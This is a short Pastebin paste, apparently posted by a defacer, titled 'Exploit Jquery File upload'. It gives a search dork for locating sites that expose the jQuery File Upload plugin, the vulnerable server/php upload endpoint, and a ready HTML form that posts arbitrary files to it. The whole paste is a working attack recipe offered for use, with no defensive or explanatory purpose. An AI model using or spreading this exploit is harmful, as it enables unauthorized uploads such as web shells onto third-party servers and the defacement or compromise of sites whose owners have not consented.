Advertisement
AngrY_DefaceR

Exploit Jquery File upload

Aug 24th, 2016
1,061
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.35 KB | None | 0 0
  1. Dork :
  2. /assets/global/plugins/jquery-file-upload/
  3.  
  4. Exploit :
  5. http://localhost/assets/global/plugins/jquery-file-upload/server/php/
  6.  
  7. Script CSRF :
  8. <form method="POST" action="http://localhost/assets/global/plugins/jquery-file-upload/server/php/"
  9. enctype="multipart/form-data">
  10. <input type="file" name="files[]" /><button>Upload</button>
  11. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement